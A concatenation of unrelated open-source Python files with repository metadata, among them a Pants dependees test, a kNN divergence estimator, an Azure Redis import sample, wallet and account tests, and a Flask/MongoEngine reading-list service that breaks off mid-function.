'Operating System :: POSIX :: Linux',
],
keywords='XenServer XenAPI virtualization automation',
install_requires=requires,
include_package_data=True,
packages=find_packages(),
package_data={'examples': ['*.yaml', '*.jinja2']},
entry_points={
'console_scripts': ['strikepackage = strikepackage.strikepackage:main']
},
)
| {
"content_hash": "c48a3b44f0a336178c8563d2d5dc5def",
"timestamp": "",
"source": "github",
"line_count": 65,
"max_line_length": 79,
"avg_line_length": 29.46153846153846,
"alnum_prop": 0.6318537859007833,
"repo_name": "pwyliu/strikepackage",
"id": "f236c92fe62c811692fe807e58a9db0d5a216b8f",
"size": "1915",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "32867"
}
],
"symlink_target": ""
} |
from textwrap import dedent
from pants.testutil.pants_run_integration_test import PantsRunIntegrationTest
class DependeesIntegrationTest(PantsRunIntegrationTest):
TARGET = "examples/src/scala/org/pantsbuild/example/hello/welcome"
def run_dependees(self, *dependees_options):
args = ["-q", "dependees", self.TARGET]
args.extend(dependees_options)
pants_run = self.run_pants(args)
self.assert_success(pants_run)
return pants_run.stdout_data.strip()
def test_dependees_basic(self):
pants_stdout = self.run_dependees()
expected = {
"examples/src/scala/org/pantsbuild/example/jvm_run:jvm-run-example-lib",
"examples/src/scala/org/pantsbuild/example/hello/exe:exe",
"examples/tests/scala/org/pantsbuild/example/hello/welcome:welcome",
}
actual = set(pants_stdout.split())
self.assertEqual(expected, actual)
def test_dependees_transitive(self):
pants_stdout = self.run_dependees("--dependees-transitive")
self.assertEqual(
{
"examples/src/scala/org/pantsbuild/example/jvm_run:jvm-run-example-lib",
"examples/src/scala/org/pantsbuild/example/hello:hello",
"examples/src/scala/org/pantsbuild/example/jvm_run:jvm-run-example",
"examples/src/scala/org/pantsbuild/example/hello/exe:exe",
"examples/tests/scala/org/pantsbuild/example/hello/welcome:welcome",
},
set(pants_stdout.split()),
)
def test_dependees_closed(self):
pants_stdout = self.run_dependees("--dependees-closed")
self.assertEqual(
{
"examples/src/scala/org/pantsbuild/example/hello/welcome:welcome",
"examples/src/scala/org/pantsbuild/example/jvm_run:jvm-run-example-lib",
"examples/src/scala/org/pantsbuild/example/hello/exe:exe",
"examples/tests/scala/org/pantsbuild/example/hello/welcome:welcome",
},
set(pants_stdout.split()),
)
def test_dependees_json(self):
pants_stdout = self.run_dependees("--dependees-output-format=json")
self.assertEqual(
dedent(
"""
{
"examples/src/scala/org/pantsbuild/example/hello/welcome:welcome": [
"examples/src/scala/org/pantsbuild/example/hello/exe:exe",
"examples/src/scala/org/pantsbuild/example/jvm_run:jvm-run-example-lib",
"examples/tests/scala/org/pantsbuild/example/hello/welcome:welcome"
]
}"""
).lstrip("\n"),
pants_stdout,
)
| {
"content_hash": "3f95930ffa287939361cbe3e7e85f5ae",
"timestamp": "",
"source": "github",
"line_count": 67,
"max_line_length": 96,
"avg_line_length": 41.17910447761194,
"alnum_prop": 0.602392171076477,
"repo_name": "wisechengyi/pants",
"id": "fef4ff1fbc2da9ddb86a56e3afedba28e1b53627",
"size": "2891",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "tests/python/pants_test/engine/legacy/test_dependees_integration.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "655"
},
{
"name": "C++",
"bytes": "2010"
},
{
"name": "CSS",
"bytes": "9444"
},
{
"name": "Dockerfile",
"bytes": "6634"
},
{
"name": "GAP",
"bytes": "1283"
},
{
"name": "Gherkin",
"bytes": "919"
},
{
"name": "Go",
"bytes": "2765"
},
{
"name": "HTML",
"bytes": "44381"
},
{
"name": "Java",
"bytes": "507948"
},
{
"name": "JavaScript",
"bytes": "22906"
},
{
"name": "Python",
"bytes": "7608990"
},
{
"name": "Rust",
"bytes": "1005243"
},
{
"name": "Scala",
"bytes": "106520"
},
{
"name": "Shell",
"bytes": "105217"
},
{
"name": "Starlark",
"bytes": "489739"
},
{
"name": "Thrift",
"bytes": "2953"
}
],
"symlink_target": ""
} |
__version__ = "0.9.10.3"
# cfgrib core API depends on the ECMWF ecCodes C-library only
from .abc import Field, Fieldset, Index, MappingFieldset
from .cfmessage import COMPUTED_KEYS
from .dataset import (
Dataset,
DatasetBuildError,
compute_index_keys,
open_fieldset,
open_file,
open_from_index,
)
from .messages import FieldsetIndex, FileStream, Message
# NOTE: xarray is not a hard dependency, but let's provide helpers if it is available.
try:
from .xarray_store import open_dataset, open_datasets
except ImportError:
pass
| {
"content_hash": "8fd8da2998bb3c444ff8bd1e1875c675",
"timestamp": "",
"source": "github",
"line_count": 20,
"max_line_length": 86,
"avg_line_length": 27.95,
"alnum_prop": 0.7334525939177102,
"repo_name": "ecmwf/cfgrib",
"id": "cc71588d47d37b274b46b61f208373502fdf6318",
"size": "1188",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "cfgrib/__init__.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Jupyter Notebook",
"bytes": "2358"
},
{
"name": "Makefile",
"bytes": "820"
},
{
"name": "PowerShell",
"bytes": "3150"
},
{
"name": "Python",
"bytes": "163895"
}
],
"symlink_target": ""
} |
from azure.identity import DefaultAzureCredential
from azure.mgmt.redisenterprise import RedisEnterpriseManagementClient
"""
# PREREQUISITES
pip install azure-identity
pip install azure-mgmt-redisenterprise
# USAGE
python redis_enterprise_databases_import.py
    Before running the sample, please set the values of the client ID, tenant ID and client secret
of the AAD application as environment variables: AZURE_CLIENT_ID, AZURE_TENANT_ID,
AZURE_CLIENT_SECRET. For more info about how to get the value, please see:
https://docs.microsoft.com/azure/active-directory/develop/howto-create-service-principal-portal
"""
def main():
client = RedisEnterpriseManagementClient(
credential=DefaultAzureCredential(),
subscription_id="subid",
)
response = client.databases.begin_import_method(
resource_group_name="rg1",
cluster_name="cache1",
database_name="default",
parameters={
"sasUris": [
"https://contosostorage.blob.core.window.net/urltoBlobFile1?sasKeyParameters",
"https://contosostorage.blob.core.window.net/urltoBlobFile2?sasKeyParameters",
]
},
).result()
print(response)
# x-ms-original-file: specification/redisenterprise/resource-manager/Microsoft.Cache/stable/2022-01-01/examples/RedisEnterpriseDatabasesImport.json
if __name__ == "__main__":
main()
| {
"content_hash": "3c544392f78b619cb158f244408e9366",
"timestamp": "",
"source": "github",
"line_count": 40,
"max_line_length": 147,
"avg_line_length": 35.475,
"alnum_prop": 0.7061310782241015,
"repo_name": "Azure/azure-sdk-for-python",
"id": "a1111a5b6ce665b4f97ff16dbbaea5212ee84830",
"size": "1887",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "sdk/redisenterprise/azure-mgmt-redisenterprise/generated_samples/redis_enterprise_databases_import.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "1224"
},
{
"name": "Bicep",
"bytes": "24196"
},
{
"name": "CSS",
"bytes": "6089"
},
{
"name": "Dockerfile",
"bytes": "4892"
},
{
"name": "HTML",
"bytes": "12058"
},
{
"name": "JavaScript",
"bytes": "8137"
},
{
"name": "Jinja",
"bytes": "10377"
},
{
"name": "Jupyter Notebook",
"bytes": "272022"
},
{
"name": "PowerShell",
"bytes": "518535"
},
{
"name": "Python",
"bytes": "715484989"
},
{
"name": "Shell",
"bytes": "3631"
}
],
"symlink_target": ""
} |
from __future__ import division
import numpy as np
from .utils import lazy_range, izip, iteritems
from .mp_utils import progress
def _linear(Bs, dim, num_q, rhos, nus):
# and the rest of the estimator is
# B / m * mean(nu ^ -dim)
return Bs / num_q * np.mean(nus ** (-dim), axis=0)
def kl(Ks, dim, num_q, rhos, nus):
r'''
Estimate the KL divergence between distributions:
\int p(x) \log (p(x) / q(x))
using the kNN-based estimator (5) of
Qing Wang, Sanjeev R Kulkarni, and Sergio Verdu (2009).
Divergence Estimation for Multidimensional Densities Via
k-Nearest-Neighbor Distances.
IEEE Transactions on Information Theory.
http://www.ee.princeton.edu/~verdu/reprints/WanKulVer.May2009.pdf
which is:
d * 1/n \sum \log (nu_k(i) / rho_k(i)) + log(m / (n - 1))
Enforces KL >= 0.
Returns an array of shape (num_Ks,).
'''
est = dim * np.mean(np.log(nus) - np.log(rhos), axis=0)
est += np.log(num_q / (rhos.shape[0] - 1))
np.maximum(est, 0, out=est)
return est
kl.self_value = 0
kl.needs_alpha = False
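# A minimal usage sketch (not part of the original module): kl() only needs the
# two kNN-distance arrays of shape (n, len(Ks)). One hypothetical way to build
# them is scikit-learn's NearestNeighbors (an assumed extra dependency here):
#
#   from sklearn.neighbors import NearestNeighbors
#   X, Y = np.random.randn(500, 3), np.random.randn(400, 3) + 1
#   Ks = np.array([3, 5])
#   # rhos: in-sample distances; drop column 0, each point's zero distance to itself
#   rhos = NearestNeighbors(n_neighbors=Ks.max() + 1).fit(X).kneighbors(X)[0][:, 1:][:, Ks - 1]
#   # nus: distances from each point of X into the other sample Y
#   nus = NearestNeighbors(n_neighbors=Ks.max()).fit(Y).kneighbors(X)[0][:, Ks - 1]
#   est = kl(Ks, dim=3, num_q=Y.shape[0], rhos=rhos, nus=nus)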
def _alpha_div(omas, Bs, dim, num_q, rhos, nus):
N = rhos.shape[0]
# the actual main estimate:
# rho^(- dim * est alpha) nu^(- dim * est beta)
# = (rho / nu) ^ (dim * (1 - alpha))
# do some reshaping trickery to get broadcasting right
estimates = (rhos / nus)[:, np.newaxis, :]
estimates = estimates ** (dim * omas.reshape(1, -1, 1))
estimates = np.mean(estimates, axis=0) # shape (n_alphas, n_Ks)
estimates *= Bs
# factors based on the sizes:
# 1 / [ (n-1)^(est alpha) * m^(est beta) ] = ((n-1) / m) ^ (1 - alpha)
estimates *= ((N - 1) / num_q) ** omas
np.maximum(estimates, 0, out=estimates)
return estimates
def _jensen_shannon_core(Ks, dim, min_i, digamma_vals, num_q, rhos, nus):
# We need to calculate the mean over points in X of
# d * log radius of largest ball with no more than M/(n+m-1) weight
# where X points have weight 1 / (2 (n-1))
# and Y points have weight 1 / (2 m)
# - digamma(# of neighbors in that ball)
# NOTE: this is a stupidly slow implementation. the cython one should
# be much better, and also parallelize.
num_p = rhos.shape[0]
t = 2 * num_p - 1
p_wt = 1 / t
q_wt = num_p / (num_q * t)
alphas = Ks / (num_p + num_q - 1)
est = np.zeros(Ks.size)
max_k = rhos.shape[1]
combo = np.empty(max_k * 2, dtype=[('dist', np.float32), ('weight', float)])
# could vectorize this loop if searchsorted worked axis-wise
for rho, nu, in izip(rhos, nus):
combo['dist'][:max_k] = rho
combo['dist'][max_k:] = nu
combo['weight'][:max_k] = p_wt
combo['weight'][max_k:] = q_wt
combo.sort()
quantiles = np.cumsum(combo['weight'])
i = quantiles.searchsorted(alphas, side='right') # number pts in ball
assert i.min() >= min_i
est += dim * np.log(combo['dist'][i - 1]) - digamma_vals[i - min_i]
est /= num_p
return est
################################################################################
def _estimate_cross_divs(features, indices, rhos,
mask, funcs, Ks, max_K, save_all_Ks,
specs, n_meta_only,
progressbar, cores, min_dist):
n_bags = len(features)
K_indices = Ks - 1
which_Ks = slice(None, None) if save_all_Ks else K_indices
outputs = np.empty((n_bags, n_bags, len(specs) + n_meta_only, len(Ks)),
dtype=np.float32)
outputs.fill(np.nan)
# TODO: should just call functions that need self up here with rhos
# instead of computing nus and then throwing them out below
any_run_self = False
all_bags = lazy_range(n_bags)
for func, info in iteritems(funcs):
self_val = getattr(func, 'self_value', None)
if self_val is not None:
pos = np.reshape(info.pos, (-1, 1))
outputs[all_bags, all_bags, pos, :] = self_val
else:
any_run_self = True
# Keep track of whether each function needs rho_sub or just rho
# TODO: this could be faster....
if save_all_Ks:
_needs_sub = {}
def needs_sub(func):
r = _needs_sub.get(func, None)
if r is None:
_needs_sub[func] = r = not getattr(func, 'needs_all_ks', False)
return r
else:
def needs_sub(func):
return False
indices_loop = progress()(indices) if progressbar else indices
for i, index in enumerate(indices_loop):
# Loop over rows of the output array.
#
# We want to search from most(?) of the other bags to this one, as
# determined by mask and to avoid repeating nus.
#
# But we don't want to waste memory copying almost all of the features.
#
# So instead we'll run a separate NN search for each contiguous
# subarray of the features. If they're too small, of course, this hurts
# the parallelizability.
#
# TODO: is there a better scheme than this? use a custom version of
# nanoflann or something?
#
# TODO: Is cythonning this file/this function worth it?
num_q = features._n_pts[i]
# make a boolean array of whether we want to do the ith bag
do_bag = mask[i]
if not any_run_self:
do_bag = do_bag.copy()
do_bag[i] = False
# loop over contiguous sections where do_bag is True
change_pts = np.hstack([0, np.diff(do_bag).nonzero()[0] + 1, n_bags])
s = 0 if do_bag[0] else 1
for start, end in izip(change_pts[s::2], change_pts[s+1::2]):
boundaries = features._boundaries[start:end+1]
feats = features._features[boundaries[0]:boundaries[-1]]
base = boundaries[0]
# find the nearest neighbors in features[i] from each of these bags
neighbors = np.maximum(min_dist,
np.sqrt(index.nn_index(feats, max_K)[1][:, which_Ks]))
for j_sub, j in enumerate(lazy_range(start, end)):
rho = rhos[j]
nu_start = boundaries[j_sub] - base
nu_end = boundaries[j_sub + 1] - base
nu = neighbors[nu_start:nu_end]
if save_all_Ks:
rho_sub = rho[:, K_indices]
nu_sub = nu[:, K_indices]
if i == j:
for func, info in iteritems(funcs):
o = (j, i, info.pos, slice(None))
if getattr(func, 'self_value', None) is None:
# otherwise, already set it above
if needs_sub(func):
outputs[o] = func(num_q, rho_sub, rho_sub)
else:
outputs[o] = func(num_q, rho, rho)
else:
for func, info in iteritems(funcs):
o = (j, i, info.pos, slice(None))
if needs_sub(func):
outputs[o] = func(num_q, rho_sub, nu_sub)
else:
outputs[o] = func(num_q, rho, nu)
return outputs
| {
"content_hash": "952b0ef9b638ef3491d0913633cb0382",
"timestamp": "",
"source": "github",
"line_count": 203,
"max_line_length": 80,
"avg_line_length": 36.38423645320197,
"alnum_prop": 0.5335770376387761,
"repo_name": "dougalsutherland/py-sdm",
"id": "1136a51fe256d1fd15d8a8ba5976bbdd8d4a234c",
"size": "7386",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "sdm/_np_divs.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "265012"
}
],
"symlink_target": ""
} |
from flask_failsafe import failsafe
@failsafe
def create_app():
from app import app
return app
if __name__ == '__main__':
create_app().run()
| {
"content_hash": "a11610ebd7b72a7abca3a972039c2e50",
"timestamp": "",
"source": "github",
"line_count": 11,
"max_line_length": 35,
"avg_line_length": 14.272727272727273,
"alnum_prop": 0.6242038216560509,
"repo_name": "Snuggert/moda",
"id": "00d873a76f7b21b51456043d29f009bbc0c4ebc1",
"size": "157",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "project/run.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "26609"
},
{
"name": "TeX",
"bytes": "4975"
}
],
"symlink_target": ""
} |
"""
Tests for the `v2ex last` function
"""
from __future__ import absolute_import
import re
import pytest
from v2ex_daily_mission.cli import cli
@pytest.mark.usefixtures('mock_api')
class TestLast():
def test_last(self, runner):
result = runner.invoke(cli, ['--config', './tests/v2ex_config.json',
'last'])
day = int(re.search(r'\d+', result.output).group())
assert result.exit_code == 0
assert day == 334
| {
"content_hash": "14ce657bb71de914970bee06474fedfb",
"timestamp": "",
"source": "github",
"line_count": 21,
"max_line_length": 76,
"avg_line_length": 23.285714285714285,
"alnum_prop": 0.5869120654396728,
"repo_name": "lord63/v2ex_daily_mission",
"id": "2c2fa5dda9208cbbd306c60ebb79ac2a134be9ea",
"size": "536",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/test_last.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "8323"
},
{
"name": "Makefile",
"bytes": "172"
},
{
"name": "Python",
"bytes": "11421"
}
],
"symlink_target": ""
} |
from test_framework.test_framework import KoreTestFramework
from test_framework.util import *
class ZapWalletTXesTest (KoreTestFramework):
def setup_chain(self):
print("Initializing test directory "+self.options.tmpdir)
initialize_chain_clean(self.options.tmpdir, 3)
def setup_network(self, split=False):
self.nodes = start_nodes(3, self.options.tmpdir)
connect_nodes_bi(self.nodes,0,1)
connect_nodes_bi(self.nodes,1,2)
connect_nodes_bi(self.nodes,0,2)
self.is_network_split=False
self.sync_all()
def run_test (self):
print("Mining blocks...")
self.nodes[0].generate(1)
self.sync_all()
self.nodes[1].generate(101)
self.sync_all()
assert_equal(self.nodes[0].getbalance(), 50)
txid0 = self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), 11)
txid1 = self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), 10)
self.sync_all()
self.nodes[0].generate(1)
self.sync_all()
txid2 = self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), 11)
txid3 = self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), 10)
tx0 = self.nodes[0].gettransaction(txid0)
assert_equal(tx0['txid'], txid0) #tx0 must be available (confirmed)
tx1 = self.nodes[0].gettransaction(txid1)
assert_equal(tx1['txid'], txid1) #tx1 must be available (confirmed)
tx2 = self.nodes[0].gettransaction(txid2)
assert_equal(tx2['txid'], txid2) #tx2 must be available (unconfirmed)
tx3 = self.nodes[0].gettransaction(txid3)
assert_equal(tx3['txid'], txid3) #tx3 must be available (unconfirmed)
#restart kored
self.nodes[0].stop()
kored_processes[0].wait()
self.nodes[0] = start_node(0,self.options.tmpdir)
tx3 = self.nodes[0].gettransaction(txid3)
assert_equal(tx3['txid'], txid3) #tx must be available (unconfirmed)
self.nodes[0].stop()
kored_processes[0].wait()
#restart kored with zapwallettxes
self.nodes[0] = start_node(0,self.options.tmpdir, ["-zapwallettxes=1"])
assert_raises(JSONRPCException, self.nodes[0].gettransaction, [txid3])
        # there must be an exception because the unconfirmed wallet tx must be gone by now
tx0 = self.nodes[0].gettransaction(txid0)
assert_equal(tx0['txid'], txid0) #tx0 (confirmed) must still be available because it was confirmed
if __name__ == '__main__':
ZapWalletTXesTest ().main ()
| {
"content_hash": "d17e55296586a6e25570936143d9b446",
"timestamp": "",
"source": "github",
"line_count": 71,
"max_line_length": 106,
"avg_line_length": 37.49295774647887,
"alnum_prop": 0.6187077385424493,
"repo_name": "Kore-Core/kore",
"id": "eae2229cbd04a2ad76c00e74933edd5029392847",
"size": "2874",
"binary": false,
"copies": "1",
"ref": "refs/heads/momentum",
"path": "qa/rpc-tests/zapwallettxes.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "5751739"
},
{
"name": "C++",
"bytes": "5106026"
},
{
"name": "CSS",
"bytes": "43192"
},
{
"name": "HTML",
"bytes": "50621"
},
{
"name": "Java",
"bytes": "2097"
},
{
"name": "M4",
"bytes": "146760"
},
{
"name": "Makefile",
"bytes": "99440"
},
{
"name": "Objective-C",
"bytes": "4343"
},
{
"name": "Objective-C++",
"bytes": "7226"
},
{
"name": "Python",
"bytes": "680485"
},
{
"name": "QMake",
"bytes": "2017"
},
{
"name": "Roff",
"bytes": "3687"
},
{
"name": "Shell",
"bytes": "35590"
}
],
"symlink_target": ""
} |
import unittest
from pymal import account
from pymal.account_objects import account_mangas
from pymal.account_objects import account_animes
from pymal.account_objects import account_friends
from tests.constants_for_testing import ACCOUNT_TEST_USERNAME, ACCOUNT_TEST_PASSWORD
class InitTestCase(unittest.TestCase):
def test_init_not_auth(self):
accnt = account.Account(ACCOUNT_TEST_USERNAME)
self.assertFalse(accnt.is_auth)
account.Account._unregiter(accnt)
def test_account_init_auth(self):
accnt = account.Account(ACCOUNT_TEST_USERNAME, ACCOUNT_TEST_PASSWORD)
self.assertTrue(accnt.is_auth)
account.Account._unregiter(accnt)
def test_init_auth_bad_password(self):
accnt = account.Account(ACCOUNT_TEST_USERNAME, ACCOUNT_TEST_PASSWORD * 2)
self.assertFalse(accnt.is_auth)
account.Account._unregiter(accnt)
def test_init_later_auth(self):
accnt = account.Account(ACCOUNT_TEST_USERNAME)
self.assertFalse(accnt.is_auth)
accnt.change_password(ACCOUNT_TEST_PASSWORD)
self.assertTrue(accnt.is_auth)
account.Account._unregiter(accnt)
def test_init_later_auth_bad_password(self):
accnt = account.Account(ACCOUNT_TEST_USERNAME)
self.assertFalse(accnt.is_auth)
self.assertFalse(accnt.change_password(ACCOUNT_TEST_PASSWORD * 2))
self.assertFalse(accnt.is_auth)
account.Account._unregiter(accnt)
def test_str_no_password(self):
accnt = account.Account(ACCOUNT_TEST_USERNAME)
self.assertEqual(str(accnt), "<Account username: pymal-developr>")
account.Account._unregiter(accnt)
def test_str_with_password(self):
accnt = account.Account(ACCOUNT_TEST_USERNAME, ACCOUNT_TEST_PASSWORD)
self.assertEqual(str(accnt), "<Account username: pymal-developr>")
account.Account._unregiter(accnt)
def test_user_id(self):
accnt = account.Account(ACCOUNT_TEST_USERNAME)
self.assertEqual(accnt.user_id, 3854655)
account.Account._unregiter(accnt)
class FunctionsTestCase(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.account = account.Account(ACCOUNT_TEST_USERNAME, ACCOUNT_TEST_PASSWORD)
@classmethod
def tearDownClass(cls):
account.Account._unregiter(cls.account)
def test_reload(self):
self.assertIsInstance(self.account.animes, account_animes.AccountAnimes)
self.assertIsInstance(self.account.mangas, account_mangas.AccountMangas)
self.assertIsInstance(self.account.friends, account_friends.AccountFriends)
def test_username(self):
self.assertEqual(self.account.username, ACCOUNT_TEST_USERNAME)
def main():
unittest.main()
if '__main__' == __name__:
main()
| {
"content_hash": "8a59940f486264fcfad0eb19d0099b1d",
"timestamp": "",
"source": "github",
"line_count": 83,
"max_line_length": 84,
"avg_line_length": 33.72289156626506,
"alnum_prop": 0.7034655234012147,
"repo_name": "pymal-developers/pymal",
"id": "5e11591c55e9c73684f8f3dab038fc33cee062e0",
"size": "2799",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "tests/test_account.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "23557"
},
{
"name": "HTML",
"bytes": "251730"
},
{
"name": "JavaScript",
"bytes": "42595"
},
{
"name": "Python",
"bytes": "175513"
},
{
"name": "Shell",
"bytes": "58"
}
],
"symlink_target": ""
} |
from pyss.mpi.algorithm.linsolve import *
from pyss.mpi.algorithm.svd import *
| {
"content_hash": "9e132ae091fab086bb88b892cee5f102",
"timestamp": "",
"source": "github",
"line_count": 2,
"max_line_length": 41,
"avg_line_length": 39.5,
"alnum_prop": 0.7974683544303798,
"repo_name": "ibara1454/pyss",
"id": "b6ef76f7a919f08af5f6795eede5db6392128ee9",
"size": "126",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "pyss/mpi/algorithm/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Matlab",
"bytes": "14795"
},
{
"name": "Python",
"bytes": "68840"
},
{
"name": "Shell",
"bytes": "1098"
}
],
"symlink_target": ""
} |
from copy import deepcopy
from bson.objectid import ObjectId
from flask_mongoengine import DoesNotExist
from mongoengine.queryset.visitor import Q
from pymongo import UpdateOne
from app.api.article.model import Article
from app.api.comment.model import Comment
from app.api.group.model import Group
from app.api.list.model import List
from app.api.user.model import User
from app.api.vote.model import Vote
from app.api.invitation.model import Invitation
from app.exception.UserHasVoted import UserHasVoted
def find_user(email):
# Find the existed user by email
try:
user = User.objects.get(email__exact=email)
except DoesNotExist:
# The user does not exist
return None
return user
def create_user(email, first_name, last_name):
# Create new user
new_user = User(email=email, first_name=first_name, last_name=last_name).save()
return new_user
def find_list(list_id):
try:
# Find reading list
user_list = List.objects.get(id=ObjectId(list_id))
except Exception as e:
return type(e).__name__
return user_list
def archive_list(user, list_id):
try:
# Get the list
archived_list = List.objects.get(id=ObjectId(list_id))
User.objects.get(id=user.id, lists=archived_list)
except DoesNotExist as e:
return None
# Mark it as archived
List.objects(id=archived_list.id).update_one(archived=True)
user.reload()
return user
def retrieve_list(user, list_id):
try:
retrieved_list = List.objects.get(id=ObjectId(list_id))
User.objects.get(id=user.id, lists=retrieved_list)
except DoesNotExist:
return None
# Mark it as not archived
List.objects(id=retrieved_list.id).update_one(archived=False)
user.reload()
return user
def bulk_retrieve_list(user, lists):
try:
bulk_list = List.objects.in_bulk([ObjectId(i) for i in lists]).values()
bulk_ops = list()
# URL: http://stackoverflow.com/questions/30943076/mongoengine-bulk-update-without-objects-update
# Author: lucasdavid
        # Build bulk update ops to un-archive the retrieved lists
for each in bulk_list:
bulk_ops.append(UpdateOne({'_id': each.id}, {'$set': {'archived': False}}))
# Execute
collection = List._get_collection().bulk_write(bulk_ops, ordered=False)
except Exception as e:
return type(e).__name__
def archive_group_list(group_id, list_id):
try:
# Check if list exists
archived_list = List.objects.get(id=ObjectId(list_id))
# Check if the list belongs to the group
group = Group.objects.get(id=ObjectId(group_id), lists=archived_list)
except DoesNotExist:
return None
List.objects(id=archived_list.id).update_one(archived=True)
return group
def retrieve_group_list(group_id, list_id):
try:
# Check if list exists
retrieved_list = List.objects.get(id=ObjectId(list_id))
# Check if the list belongs to the group
group = Group.objects.get(id=ObjectId(group_id), lists=retrieved_list)
except DoesNotExist:
return None
List.objects(id=retrieved_list.id).update_one(archived=False)
return group
# def get_user_all_lists(user):
# # user = User.objects.get(id=user.id, lists__)
# pipeline = [
# {'$match': {'email': '[email protected]'}},
# {'$unwind': '$lists'},
# {'$lookup': {
# 'from': 'list',
# 'localField': 'lists',
# 'foreignField': '_id',
# 'as': 'listObj'
# }},
# {'$unwind': '$listObj'},
# {'$match': {'listObj.archived': {'$ne': 'true'}}},
# {'$group': {'_id': '$_id',
# 'email': {'$first': '$email'},
# 'last_name': {'$first': '$last_name'},
# 'first_name': {'$first': 'first_name'},
# 'lists': {'$push': '$lists'}}}
# ]
# pass
def create_list(list_name, user):
# Create new list
new_list = List(name=list_name).save()
# Append list reference to the user's lists list
User.objects(id=user.id).update_one(push__lists=new_list)
return new_list
def rename_personal_list(user, list_id, new_name):
try:
# Rename the list
the_list = List.objects.get(id=ObjectId(list_id))
List.objects(id=the_list.id).update_one(name=new_name)
except Exception as e:
return type(e).__name__
def create_article(user, data, list_id):
try:
# Check if list exists
List.objects.get(id=ObjectId(list_id))
# Create new article
new_article = Article(**data, creator=user).save()
except Exception as e:
return type(e).__name__
# Append article reference to the user's article lists
List.objects(id=list_id).update_one(push__articles=new_article)
return new_article
def update_article(data, article_id):
try:
# Check if the article exists
article = Article.objects.get(id=ObjectId(article_id))
# Update article
Article.objects(id=ObjectId(article_id)).update_one(**data)
except Exception as e:
return type(e).__name__
# Article.objects(id=ObjectId(article_id)).update_one(**data)
article.reload()
return article
def create_article_in_group(user, data, list_id, group_id):
try:
        # Check if the list exists
the_list = List.objects.get(id=ObjectId(list_id))
# Check if the list belongs to the group
the_group = Group.objects.get(Q(id=ObjectId(group_id)) & Q(lists=the_list))
# create new article
new_article = create_article(user, data, list_id)
# init the vote
Vote(article=new_article, list=the_list).save()
except Exception as e:
return type(e).__name__
return new_article
def find_article(article_id):
# Find the article
try:
article = Article.objects.get(id=ObjectId(article_id))
except DoesNotExist:
return None
return article
def add_article_to_list(list_id, article_id):
# Find the article
try:
article = find_article(article_id)
except DoesNotExist:
return None
# Find the list
try:
reading_list = find_list(list_id)
except DoesNotExist:
return None
# Add the article to the list
List.objects(id=ObjectId(list_id)).update_one(push__articles=article)
reading_list.reload()
return reading_list
def add_article_to_group_list(group_id, list_id, article_id):
# Find the article
try:
article = find_article(article_id)
reading_list = find_list(list_id)
# Add the article to the list
List.objects(id=ObjectId(list_id)).update_one(push__articles=article)
# Init the vote object
Vote(article=article, list=reading_list)
except Exception as e:
return type(e).__name__
reading_list.reload()
return reading_list
def add_tag(article_id, tag):
try:
article = Article.objects.get(id=ObjectId(article_id))
except DoesNotExist:
return None
# Add tag to article
Article.objects(id=article.id).update_one(push__tags=tag)
article.reload()
return article
def delete_article(user, list_id, article_id):
    # Retrieve the article and list to be deleted
try:
# Check resource
the_article = Article.objects.get(id=ObjectId(article_id))
the_list = List.objects.get(Q(id=ObjectId(list_id)) & Q(articles=the_article))
# Remove the article from the database
Article.objects(id=the_article.id).delete()
# Remove the vote as well
Vote.objects(article=the_article, list=the_list).delete()
except Exception as e:
return type(e).__name__
the_list.reload()
return the_list
def archive_article(user, list_id, article_id):
    # Retrieve the article and list to be archived
try:
# Check resource
the_article = Article.objects.get(id=ObjectId(article_id))
the_list = List.objects.get(Q(id=ObjectId(list_id)) & Q(articles=the_article))
# Remove the article from the list
List.objects(id=the_list.id).update_one(pull__articles=the_article)
# Remove the vote as well
Vote.objects(article=the_article, list=the_list).delete()
except Exception as e:
return type(e).__name__
the_list.reload()
return the_list
def add_comment(user, article_id, comment, public=True):
try:
# Check if article exists
article = Article.objects.get(id=ObjectId(article_id))
# Post comment
new_comment = Comment(content=comment, public=public, author=user.email).save()
# Add reference to the article
Article.objects(id=article.id).update_one(push__comments=new_comment)
except Exception as e:
return type(e).__name__
return new_comment
def create_group(group_name, moderator, members=None, description=None):
# Create group
new_group = Group(name=group_name, moderator=moderator, description=description).save()
# Add moderator to members
Group.objects(id=new_group.id).update_one(push__members=moderator)
# Add members if not null
member_buffer = list()
if members:
for email in members:
try:
user = User.objects.get(email=email)
member_buffer.append(user)
except Exception as e:
return type(e).__name__
finally:
# Even if exception occurs, still be able to add a portion of user
Group.objects(id=new_group.id).update_one(add_to_set__members=member_buffer)
# Bulk update
Group.objects(id=new_group.id).update_one(add_to_set__members=member_buffer)
new_group.reload()
return new_group
def find_group(group_id):
try:
# Find group
reading_group = Group.objects.get(id=ObjectId(group_id))
except DoesNotExist:
return None
return reading_group
def add_group_member(group_id, member_email):
try:
# Find the group and user
reading_group = find_group(group_id)
new_member = User.objects.get(email=member_email)
# Add user to group
